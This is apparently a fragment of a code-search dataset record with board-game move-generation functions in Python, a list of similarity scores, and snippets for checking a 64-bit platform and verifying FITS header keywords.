[(orient, adj) for orient, adj in enumerate(self.adjacent[from_pos]) if\n adj is not None and self.board[adj] == 0] # TODO added not, need to validate\n if_played_board = self.board.copy()\n if_played_board[from_pos] = 0\n for (orient, adj) in mill_cands:\n if self.is_mill(player, adj, if_played_board):\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if not self.is_mill(-player, opp_p, if_played_board)]\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[from_pos, orient, opp_pos] = True\n else:\n action_mask[from_pos, orient, -1] = True\n\n return action_mask", "def get_king_moves(self, i, j, moves):\r\n directions = ((1, 1), (1, -1), (1, 0), (0, -1), (0, 1), (-1, -1), (-1, 1), (-1, 0))\r\n if self.turn_white:\r\n oponent = 'b'\r\n else:\r\n oponent = 'w'\r\n for d in directions:\r\n cri = i + d[0]\r\n crj = j + d[1]\r\n if 0 <= cri <= 7 and 0 <= crj <= 7:\r\n # empty\r\n if self.board[cri][crj][0] == '-':\r\n moves.append(Move((i, j), (cri, crj), self.board))\r\n\r\n # oponent\r\n elif self.board[cri][crj][0] == oponent:\r\n moves.append(Move((i, j), (cri, crj), self.board))", "def legal_moves(player, board):\n return 
[sq for sq in Othello.squares() if Othello.is_legal(sq, player, board)]", "def __find_all_moves(self, tower) -> list:\r\n choice = []\r\n for height in range(1,len(tower.tower)-2):\r\n for index in range(1,4):\r\n if self.stat_brain.is_valid(height, index, tower):\r\n choice.append((height, index))\r\n \r\n r.shuffle(choice)\r\n return choice", "def get_possibles_moves(board: numpy.ndarray) -> List[Move]:\n return [tuple(k) for k in numpy.argwhere(board == -1) if 0 != k[0] != board.shape[0] - 1 != k[1] != 0]", "def chess_coord_moves(self, select):\n hold = []\n \n for i in self.board[select].possible_moves:\n hold.append(self.chess_coords[self.coords.index(i)])\n \n self.print_message((\"my possible moves are:\",hold))", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def get_all_moves(self, board, player):\n result = []\n for startx in range(8):\n for starty in range(8):\n for destx in range(8):\n for desty in range(8):\n if self.is_legal_move(board, [startx, starty], [destx, desty], player):\n result.append([[startx, starty], [destx, desty]])\n return result", "def choose_move(self, possible_moves, seconds_left):\n # TODO: update this method\n print('\\--------------Choose Move--------------/')\n print(possible_moves)\n print(list(self.current_board.legal_moves))\n search_tree = MCTS(5, self.color, self.current_board)\n search_tree.search()\n move = search_tree.pick_move()['move']\n\n return move", "def get_all_moves(self, castling_allowed=True):\n\n can_move = str.isupper if self.white_to_move else str.islower\n\n valid_moves = set()\n\n for row_num, row in enumerate(self.board):\n for col_num, piece in enumerate(row):\n if piece != EMPTY_SPACE and can_move(piece):\n\n location = (row_num, col_num)\n\n # Everything except the pawn movement\n if piece.lower() in NAME_TO_PIECE:\n valid_moves = valid_moves.union(self._get_standard_moves_for_piece(location, piece))\n\n # Pawn moves\n if piece.lower() == PAWN:\n valid_moves = valid_moves.union(self._get_pawn_moves(location, piece))\n\n # Castling\n if castling_allowed and piece.lower() == KING:\n valid_moves = valid_moves.union(self._get_possible_castles(piece))\n\n return valid_moves", "def findActions(problem, state):\r\n size = 
len(problem) - 1\r\n legalActions = []\r\n if state[0] > 0 and problem[state[0] - 1][state[1]] != 'w':\r\n legalActions.append('N')\r\n if state[0] < size and problem[state[0] + 1][state[1]] != 'w':\r\n legalActions.append('S')\r\n if state[1] > 0 and problem[state[0]][state[1] - 1] != 'w':\r\n legalActions.append('W')\r\n if state[1] < size and problem[state[0]][state[1] + 1] != 'w':\r\n legalActions.append('E')\r\n return legalActions", "def possible_moves(self):\n lst_of_direcs = []\n for a_car in self.__cars:\n good_moves = a_car.possible_moves()\n new = [(a_car.get_name(),dire, des) for dire, des\\\n in good_moves.items()]\n lst_of_direcs.append(new[0])\n lst_of_direcs.append(new[1])\n return lst_of_direcs", "def actions(board):\n avail_moves = set()\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == EMPTY:\n avail_moves.add((i,j))\n \n if len(avail_moves) == 0:\n return 0\n\n return avail_moves", "def legal_moves(self, player, board):\r\n #go through the whole board and check whether the piece is on the board or not\r\n #num/row size - num%col == num2/row size - num@%col\r\n #num/row size + num%col\r\n moves = list()\r\n opp = self.opponent(player)\r\n #print(board)\r\n for i in self.squares():\r\n if board[i] == core.EMPTY:\r\n for d in core.DIRECTIONS:\r\n endPt = self.find_bracket(i, player, board, d)\r\n if endPt!= None:\r\n moves.append(i)\r\n break\r\n\r\n return moves", "def possible_moves(state_int):\n assert isinstance(state_int, int)\n field = decode_binary(state_int)\n return [idx for idx, col in enumerate(field) if len(col) < GAME_ROWS]", "def get_pgn_moves(self, colour=None):\n if colour is None:\n colour = self.active_colour\n\n destintation_dict = defaultdict(tuple)\n ret = dict()\n\n ## Build a destination dict to check for ambiguous moves.\n\n\n\n for new_position in self.get_moves(colour):\n coord_to = new_position.last_move.coord_to\n piece = type(self[new_position.last_move.coord_from])\n\n\n destintation_dict[(coord_to, piece)] += (new_position,)\n \n for coord_to, piece in list(destintation_dict.keys()):\n # Check for ambigious moves\n if len(destintation_dict[coord_to, piece]) == 1:\n ambiguity = 'NONE'\n else:\n ranks = [position.last_move.coord_from[1] for position in destintation_dict[(coord_to, piece)]]\n files = [position.last_move.coord_from[0] for position in destintation_dict[(coord_to, piece)]]\n if len(ranks) == len(set(ranks)):\n ambiguity = 'RANK'\n elif len(files) == len(set(files)):\n ambiguity = 'FILE'\n else:\n ambiguity = 'BOTH'\n\n # Loop through moves and print notation for moves\n for position in destintation_dict[coord_to, piece]:\n notation = self.get_notation_for_move(position, colour, ambiguity=ambiguity)\n ret[notation] = position\n\n return ret", "def programs_dance(moves, programs):\n\n for move in moves:\n if move[0] == \"s\":\n x = int(move[1:])\n programs = programs[-x:] + programs[:-x]\n if move[0] == \"x\":\n A, B = move[1:].split(\"/\")\n A, B = int(A), int(B)\n programs[A], programs[B] = programs[B], programs[A]\n if move[0] == \"p\":\n A, B = move[1:].split(\"/\")\n A, B = programs.index(A), programs.index(B)\n programs[A], programs[B] = programs[B], programs[A]\n\n return \"\".join(programs)", "def liste_coups_possibles(self): # etape 1\n\n # On récupère toutes les cases vides\n coord_none = [(i, j) for i in range(self.game.goban.taille) for j in range(self.game.goban.taille) if self.game.goban.cell[i][j] == None]\n\n possible_moves = []\n\n for (i, j) in coord_none:\n try:\n if self.game.goban.test_move(i, j, 
self) == False:\n possible_moves.append((i, j))\n except:\n pass\n\n return possible_moves", "def get_moves(self):\n return self.piece_behavior.get_moves(self.board, self.position)", "def get_possible_actions(self, state):\n return [LEFT, DOWN, RIGHT, UP]", "def actions(self, state):\r\n\r\n valid_actions = []\r\n # What kind of an action it will be\r\n # 1. Add a new piece to the game.\r\n # 2. Move and existing piece.\r\n new_piece, player = self.new_or_old_piece(state)\r\n\r\n # If we want to place a new piece in the game\r\n if new_piece:\r\n for i in range(3):\r\n for j in range(3):\r\n if state[i][j] == '-':\r\n # (player, to, from)\r\n # Since we are introducing a new piece it's coming from\r\n # an imaginary position i.e. (9, 9)\r\n valid_actions.append((player, (i, j), (9, 9)))\r\n\r\n # when we moving an existing piece in the game\r\n else:\r\n for i in range(3):\r\n for j in range(3):\r\n if state[i][j] != '-':\r\n # Now check for places this player can move from this position\r\n for ii, jj in self.valid_adjacent_positions[(i, j)]:\r\n if state[ii][jj] == '-':\r\n # (player, to, from)\r\n valid_actions.append((state[i][j], (ii, jj), (i, j)))\r\n\r\n return copy.deepcopy(valid_actions)", "def human_turn(c_choice, h_choice,xi,yi):\r\n depth = len(empty_cells(board))\r\n if depth == 0 or game_over(board):\r\n return\r\n\r\n # Dictionary of valid moves\r\n move = -1\r\n moves = {\r\n 0: [0, 0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5], 6: [0, 6], 7: [0, 7], 8: [0, 8], 9: [0, 9],\r\n 10: [1, 0], 11: [1, 1], 12: [1, 2], 13: [1, 3], 14: [1, 4], 15: [1, 5], 16: [1, 6], 17: [1, 7], 18: [1, 8], 19: [1, 9],\r\n 20: [2, 0], 21: [2, 1], 22: [2, 2], 23: [2, 3], 24: [2, 4], 25: [2, 5], 26: [2, 6], 27: [2, 7], 28: [2, 8], 29: [2, 9],\r\n 30: [3, 0], 31: [3, 1], 32: [3, 2], 33: [3, 3], 34: [3, 4], 35: [3, 5], 36: [3, 6], 37: [3, 7], 38: [3, 8], 39: [3, 9],\r\n 40: [4, 0], 41: [4, 1], 42: [4, 2], 43: [4, 3], 44: [4, 4], 45: [4, 5], 46: [4, 6], 47: [4, 7], 48: [4, 8], 49: [4, 9],\r\n 50: [5, 0], 51: [5, 1], 52: [5, 2], 53: [5, 3], 54: [5, 4], 55: [5, 5], 56: [5, 6], 57: [5, 7], 58: [5, 8], 59: [5, 9],\r\n 60: [6, 0], 61: [6, 1], 62: [6, 2], 63: [6, 3], 64: [6, 4], 65: [6, 5], 66: [6, 6], 67: [6, 7], 68: [6, 8], 69: [6, 9],\r\n 70: [7, 0], 71: [7, 1], 72: [7, 2], 73: [7, 3], 74: [7, 4], 75: [7, 5], 76: [7, 6], 77: [7, 7], 78: [7, 8], 79: [7, 9],\r\n 80: [8, 0], 81: [8, 1], 82: [8, 2], 83: [8, 3], 84: [8, 4], 85: [8, 5], 86: [8, 6], 87: [8, 7], 88: [8, 8], 89: [8, 9],\r\n 90: [9, 0], 91: [9, 1], 92: [9, 2], 93: [9, 3], 94: [9, 4], 95: [9, 5], 96: [9, 6], 97: [9, 7], 98: [9, 8], 99: [9, 9],\r\n \r\n }\r\n\r\n clean()\r\n print(f'Human turn [{h_choice}]')\r\n render(board, c_choice, h_choice)\r\n while move < 0 or move > 99:\r\n try:\r\n move = int(input('Final position HUMAN (0..99): '))\r\n coord = moves[move]\r\n can_move = set_move(coord[0], coord[1], 2, xi, yi)\r\n if not can_move:\r\n print('Bad move')\r\n move = -1\r\n except (EOFError, KeyboardInterrupt):\r\n print('Bye')\r\n exit()\r\n except (KeyError, ValueError):\r\n print('Bad choice')", "def make_move(self, state):\r\n # intially set drop phase to true\r\n drop_phase = True\r\n move = [] # list to make moves with to return\r\n succ = self.succ(state) # get the successor of this state\r\n # intial postion of board to set up most advantagous spot if its empty\r\n if sum(x.count(self.my_piece) for x in self.board) == 0 and self.board[2][2] == ' ':\r\n move.insert(0, (2, 2))\r\n return move\r\n \r\n # check the number of 'r' 
and 'b' on board if theres 4 of each drop phase is false\r\n if sum(x.count('r') for x in self.board) == 4 and sum(x.count('b') for x in self.board) == 4:\r\n drop_phase = False\r\n\r\n # if not during drop phase use minimax to make next move from one postion to next\r\n if not drop_phase:\r\n move = []\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n f = d['from']\r\n s = sorted(succ, key=lambda e: e['f'])\r\n moveto = s[-1]\r\n move.insert(1, (moveto['from'][0], moveto['from'][1]))\r\n move.insert(0, (moveto['pos'][0], moveto['pos'][1]))\r\n return move # return the from, to move\r\n\r\n else: #else use minimax and to make move during drop phase selecting spot to place AI piece\r\n d = self.Max_value(state, 0)\r\n val = d['val']\r\n m = d['move']\r\n p = d['pos']\r\n hold = []\r\n move = []\r\n n = None\r\n hold = []\r\n for s in succ:\r\n p = s['pos'][0]\r\n p1 = s['pos'][1]\r\n if s['f'] == val and state[p][p1] == ' ':\r\n hold.append(s)\r\n if len(hold) == 1:\r\n row = hold[0]['pos'][0]\r\n col = hold[0]['pos'][1]\r\n else:\r\n f = sorted(hold, key=lambda e: e['pos'])\r\n row = f[0]['pos'][0]\r\n col = f[0]['pos'][1]\r\n\r\n move.insert(0, (row, col)) # return the move \r\n return move", "def get_next_moves2(self):\n moves = []\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n if self.board[i][j] == \"\" and self.move_makes_box(i, j):\n next_board = copy.deepcopy(self.board)\n next_board[i][j] = colors[self.turn] + self.turn + \"\\u001b[0m\"\n next_turn = get_opponent(self.turn)\n moves.append(DotsAndBoxesState(next_board, next_turn))\n return moves", "def get_tiger_possible_moves(self) -> List:\n moves = []\n for pos in self.get_all_positions():\n if pos.is_tiger():\n addr_from = pos.address\n for addr_to in pos.piece.get_valid_moves():\n moves.append((addr_from, addr_to))\n\n return moves", "def ai_move():\n\tinitial_state = map(get_filled_edges, rects)\n\tpossible_moves = []\n\tfor index, filled_edges in enumerate(initial_state):\n\t\tif filled_edges == 0:\n\t\t\tpossible_moves.extend([(index, i) for i in 'ltrb'])\n\t\telif filled_edges == 1:\n\t\t\tpossible_moves.extend(one_filled_edge(index))\n\t\telif filled_edges == 2:\n\t\t\tpossible_moves.extend(two_filled_edge(index))\n\t\telif filled_edges == 3:\n\t\t\tpossible_moves.extend(three_filled_edge(index))\n\tprint possible_moves\n\tpossible_decisions = []\n\tfor move in possible_moves:\n\t\tfinal_state = apply_move(move)\n\t\tpossible_decisions.append(is_feasible(initial_state, final_state))\n\tprint possible_decisions\n\t# randomizing when some decisions have the same weight\n\tmax_weight = max(possible_decisions)\n\t# list of indices which have the same weight\n\tmax_indices = []\n\tfor index, weight in enumerate(possible_decisions):\n\t\tif weight == max_weight:\n\t\t\tmax_indices.append(index)\n\tx = choice(max_indices)\n\tprint x\n\treturn possible_moves[x]\n\t# return possible_moves[possible_decisions.index(max(possible_decisions))]", "def get_knight_moves(self, i, j, moves):\r\n directions = ((2, 1), (2, -1), (1, 2), (1, -2), (-2, 1), (-2, -1), (-1, 2), (-1, -2))\r\n if self.turn_white:\r\n opon = 'b'\r\n else:\r\n opon = 'w'\r\n for d in directions:\r\n cri = i + d[0]\r\n crj = j + d[1]\r\n if 0 <= cri <= 7 and 0 <= crj <= 7:\r\n # empty\r\n if self.board[cri][crj][0] == '-':\r\n moves.append(Move((i, j), (cri, crj), self.board))\r\n\r\n # oponent\r\n elif self.board[cri][crj][0] == opon:\r\n moves.append(Move((i, j), (cri, crj), self.board))", "def 
get_valid_moves(self) -> list[int]:\n return self._valid_moves", "def get_all_possible_moves(self, state):\n move_list = []\n done_finding_moves = False\n any_non_pass_moves = False\n while not done_finding_moves:\n try:\n m = next(self.move_generator) # Gets a (move, state) pair.\n # print(\"next returns: \",m[0]) # Prints out the move. For debugging.\n if m[0] != 'p':\n any_non_pass_moves = True\n move_list.append(m) # Add the move to the list.\n except StopIteration as e:\n done_finding_moves = True\n if not any_non_pass_moves:\n move_list.append(('p',state))\n return move_list", "def newGame(self):\n self.last_move = \"go\"\n self.values = [None for i in range(64)]\n for i in range(8):\n self.setPiece(i, 2, self.makePiece(ChessPiece.WHITE_PAWN, i, 2, \"wpawn\"+str(i)))\n self.setPiece(i, 7, self.makePiece(ChessPiece.BLACK_PAWN, i, 7, \"bpawn\"+str(i)))\n\n self.setPiece('a', 1, self.makePiece(ChessPiece.WHITE_ROOK, 'a', 1, \"wrook0\"))\n self.setPiece('b', 1, self.makePiece(ChessPiece.WHITE_KNIGHT, 'b', 1, \"wknight0\"))\n self.setPiece('c', 1, self.makePiece(ChessPiece.WHITE_BISHOP, 'c', 1, \"wbishop0\"))\n self.setPiece('d', 1, self.makePiece(ChessPiece.WHITE_QUEEN, 'd', 1, \"wqueen\"))\n self.setPiece('e', 1, self.makePiece(ChessPiece.WHITE_KING, 'e', 1, \"wking\"))\n self.setPiece('f', 1, self.makePiece(ChessPiece.WHITE_BISHOP, 'f', 1, \"wbishop1\"))\n self.setPiece('g', 1, self.makePiece(ChessPiece.WHITE_KNIGHT, 'g', 1, \"wknight1\"))\n self.setPiece('h', 1, self.makePiece(ChessPiece.WHITE_ROOK, 'h', 1, \"wrook1\"))\n\n self.setPiece('a', 8, self.makePiece(ChessPiece.BLACK_ROOK, 'a', 8, \"brook0\"))\n self.setPiece('b', 8, self.makePiece(ChessPiece.BLACK_KNIGHT, 'b', 8, \"bknight0\"))\n self.setPiece('c', 8, self.makePiece(ChessPiece.BLACK_BISHOP, 'c', 8, \"bbishop0\"))\n self.setPiece('d', 8, self.makePiece(ChessPiece.BLACK_QUEEN, 'd', 8, \"bqueen\"))\n self.setPiece('e', 8, self.makePiece(ChessPiece.BLACK_KING, 'e', 8, \"bking\"))\n self.setPiece('f', 8, self.makePiece(ChessPiece.BLACK_BISHOP, 'f', 8, \"bbishop1\"))\n self.setPiece('g', 8, self.makePiece(ChessPiece.BLACK_KNIGHT, 'g', 8, \"bknight1\"))\n self.setPiece('h', 8, self.makePiece(ChessPiece.BLACK_ROOK, 'h', 8, \"brook1\"))", "def mappossiblemoves(self,nodeStart):\n destinations = [set() for ix in range(game.DICEMAX+1)]\n destinations[0] = set([nodeStart])\n routes = [[nodeStart]]\n #\n # TODO: Not convinced this adds anything more than it harms in this fn.\n #if self.hasEnteredRoomYet:\n # GAMEBOARD = game.TRIMMEDNODES\n #else:\n GAMEBOARD = game.BOARDNODES\n #\n for diceRoll in range(1,game.DICEMAX+1):\n newRoutes = []\n for route in routes:\n for nextLoc in GAMEBOARD[route[-1]]:\n if not nextLoc in route:\n # This location has not yet been visited by this route\n if nextLoc in game.ALLOWEDROOMNODES:\n # Location is a room - can move into it regardless\n # of population, but not move further. 
We can also\n # use any longer roll to move here by this route\n for thisRoll in range(diceRoll,game.DICEMAX+1):\n destinations[thisRoll].add(nextLoc)\n else:\n # Location is a square - can only move into it if\n # unoccupied, but can move further once there.\n if not nextLoc in self.charLocations:\n # Unoccupied (could check against \n # charLocations[1:] since we're the piece moving\n # but a nextLoc = charLocations[0] would be\n # rejected by being already in the route anyway)\n newRoute = list(route)\n newRoute.append(nextLoc)\n newRoutes.append(newRoute)\n destinations[diceRoll].add(nextLoc)\n routes = newRoutes\n #\n return [list(destSet) for destSet in destinations]", "def _get_easy_move(self):\n # Two lists keep track of regular moves and paths of possible jumps\n moves = []\n required_jumps = []\n for row in range(self._checkers.dimension):\n for col in range(self._checkers.dimension):\n # Check same color pieces as player to see if they can jump.\n if self._checkers.get(row, col) == self._player:\n path_made = False\n found_jumps = []\n # i represents an option of direction to check\n for i in range(3):\n current_path = []\n # Builds a path of jumps by checking for a jump each\n # move\n while (not path_made):\n jumps = self.check_for_jump(self._player, row, col)\n if jumps == []:\n path_made = True\n break\n current_path += (jumps)\n incrow = 0\n inccol = 0\n # South west and east\n if i == 0:\n incrow = 2\n inccol = 2\n elif i == 1:\n incrow = 2\n incrow = -2\n # North west and east\n elif i == 2:\n incrow = -2\n inccol = -2\n elif i == 3:\n incrow = -2\n incrow = 2\n row += incrow\n col += inccol\n found_jumps.append(current_path)\n if len(found_jumps) > 0:\n # If there is at least one path then we append it\n # to the list of jumps\n required_jumps += found_jumps\n else:\n # Checks if a move can be made in each direction\n north_west = self._checkers.get(row - 1, col - 1)\n north_east = self._checkers.get(row - 1, col + 1)\n south_west = self._checkers.get(row + 1, col + 1)\n south_east = self._checkers.get(row + 1, col - 1)\n if north_west == CheckersBoard.empty:\n moves.append(Move(row, col, -1, -1))\n if north_east == CheckersBoard.empty:\n moves.append(Move(row, col, -1, 1))\n if south_west == CheckersBoard.empty:\n moves.append(Move(row, col, 1, 1))\n if south_east == CheckersBoard.empty:\n moves.append(Move(row, col, 1, -1))\n # A random move is calculated for the lists of moves\n # If a move can be made we prioritize the list with possible moves\n random_index = 0\n if len(required_jumps) != 0:\n random_index = random.randint(0, len(required_jumps))\n move_path = required_jumps[random_index]\n return move_path\n else:\n random_index = random.randint(0, len(moves))\n move = moves[random_index]\n return [move]", "def moves(self):\n\n moves = list()\n\n for row in range(HEIGHT):\n for col in range(WIDTH):\n\n move = (row, col)\n\n if self.board[row][col] == 9:\n moves.append(move)\n\n if self.board[row][col] == 1 or self.board[row][col] == 2:\n\n move = (row - 1, col)\n\n if self.board[row - 1][col] == 1 or self.board[row - 1][col] == 2:\n\n pass\n\n else:\n\n moves.append(move)\n\n return moves" ]
[ "0.75860536", "0.7416093", "0.7053937", "0.69375557", "0.68239874", "0.67419034", "0.6697224", "0.6633449", "0.6593096", "0.6580948", "0.6536958", "0.65312415", "0.6490962", "0.64726305", "0.64582986", "0.6440909", "0.6390071", "0.6388789", "0.6385916", "0.6381437", "0.63710254", "0.63576955", "0.63572484", "0.63524354", "0.6325016", "0.6296218", "0.626708", "0.6246886", "0.62425584", "0.6235418", "0.62333894", "0.617431", "0.61415243", "0.6133272", "0.6133194", "0.6123466", "0.6108762", "0.60694885", "0.605355", "0.6045947", "0.604326", "0.6035398", "0.60096234", "0.6007973", "0.59959507", "0.5990438", "0.598295", "0.5980893", "0.5979063", "0.597579", "0.5970684", "0.59592587", "0.5957785", "0.5954065", "0.59422463", "0.5937205", "0.5934573", "0.5933172", "0.59103423", "0.5907071", "0.5893204", "0.58764154", "0.5867412", "0.58669657", "0.58520794", "0.5830685", "0.58213395", "0.58195806", "0.5796089", "0.5794658", "0.57924294", "0.5791798", "0.5776545", "0.5770644", "0.57703793", "0.5768232", "0.576637", "0.57627904", "0.5755819", "0.57514524", "0.57498765", "0.57493526", "0.57490695", "0.57433677", "0.5738535", "0.5736442", "0.57326424", "0.57324845", "0.57311463", "0.57151866", "0.57114714", "0.57083285", "0.57079154", "0.5703361", "0.5701694", "0.5698856", "0.56968474", "0.5694203", "0.56839556", "0.56838477" ]
0.5896593
60
This function will optionally print a header guard for `cl_khr_fp64` if a 64-bit type is used as the source or destination, and return a bool that indicates whether this guard will need to be closed after the calling function has finished printing functions that use the 64-bit source/destination type.
def conditional_guard(src, dst):
    int64_count = 0
    float64_count = 0
    float16_count = 0
    if src in int64_types or dst in int64_types:
        int64_count = 1
    if src in float64_types or dst in float64_types:
        float64_count = 1
    if src in float16_types or dst in float16_types:
        float16_count = 1
    if float16_count > 0:
        print("#ifdef cl_khr_fp16")
    if float64_count > 0:
        #In embedded profile, if cl_khr_fp64 is supported cles_khr_int64 has to be
        print("#ifdef cl_khr_fp64")
        return 1 + float16_count
    elif int64_count > 0:
        print("#if defined cles_khr_int64 || !defined(__EMBEDDED_PROFILE__)")
        return 1 + float16_count
    return float16_count
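A minimal usage sketch, not part of the original source: it assumes conditional_guard above and the three type lists it reads (int64_types, float64_types, float16_types) are in scope, and that the caller treats the returned count as the number of opened guards to close with matching #endif lines. The emit_convert_decl helper, the example type lists, and the printed declaration format are illustrative assumptions rather than the actual generator's output.
# Sketch only: illustrative type lists (assumed, not the generator's real tables).
int64_types = ["long", "ulong", "long2", "ulong2"]
float64_types = ["double", "double2"]
float16_types = ["half", "half2"]

def emit_convert_decl(src, dst):
    # conditional_guard prints any needed "#ifdef"/"#if" lines and returns
    # how many guards it opened; close each one with a matching "#endif".
    open_guards = conditional_guard(src, dst)
    print("_CLC_DECL {0} convert_{0}({1} x);".format(dst, src))  # hypothetical declaration format
    for _ in range(open_guards):
        print("#endif")

emit_convert_decl("double2", "long2")  # prints the cl_khr_fp64 guard, the declaration, then one #endif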
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_64_windows():\n return struct.calcsize('P') * 8 == 64", "def have_binary128():\n try:\n ti = type_info(np.longdouble)\n except FloatingError:\n return False\n return (ti['nmant'], ti['maxexp']) == (112, 16384)", "def is_H(self):\n return True", "def is_H(self):\n return True", "def is_64bit(self):\n pass", "def verify_header (filename, htypes=None):\n\n # dictionary\n dict_head = {\n # raw header\n # commenting out SIMPLE, BSCALE and BZERO - basic keywords\n # that will be present in images but not in binary fits tables\n #'SIMPLE': {'htype':'raw', 'dtype':bool, 'DB':False, 'None_OK':True},\n #'BSCALE': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n #'BZERO': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'BITPIX': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS1': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'NAXIS2': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'BUNIT': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n #'CCD-AMP': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'SET-TEMP': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'CCD-TEMP': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'XBINNING': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n 'YBINNING': {'htype':'raw', 'dtype':int, 'DB':False, 'None_OK':True},\n #'CCD-SET': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'ALTITUDE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'AZIMUTH': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DOMEAZ': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'RADESYS': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'EPOCH': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'RA': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'RA-REF': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n #'RA-TEL': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'DEC': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'DEC-REF': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n #'DEC-TEL': {'htype':'raw', 'dtype':float, 'DB':False, 'None_OK':True},\n 'HA': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'FLIPSTAT': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'EXPTIME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'ISTRACKI': {'htype':'raw', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'ACQSTART': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'ACQEND': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPSSTART': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPSEND': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':True},\n 'GPS-SHUT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DATE-OBS': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'MJD-OBS': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'LST': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'UTC': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':False},\n 'TIMESYS': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'ORIGIN': {'htype':'raw', 'dtype':str, 'DB':False, 'None_OK':True},\n 'MPC-CODE': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'TELESCOP': {'htype':'raw', 'dtype':str, 'DB':True, 'None_OK':False},\n 'CL-BASE': {'htype':'raw', 
'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-MAST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-DOME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-AIRCO': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RH-PIER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PRESSURE': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-PIER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-DOME': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-ROOF': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-AIRCO': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-MAST': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-STRUT': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-CRING': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-SPIDER': {'htype':'raw', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-FWN': {'htype':'raw', 'dtype':float, 'DB':True, 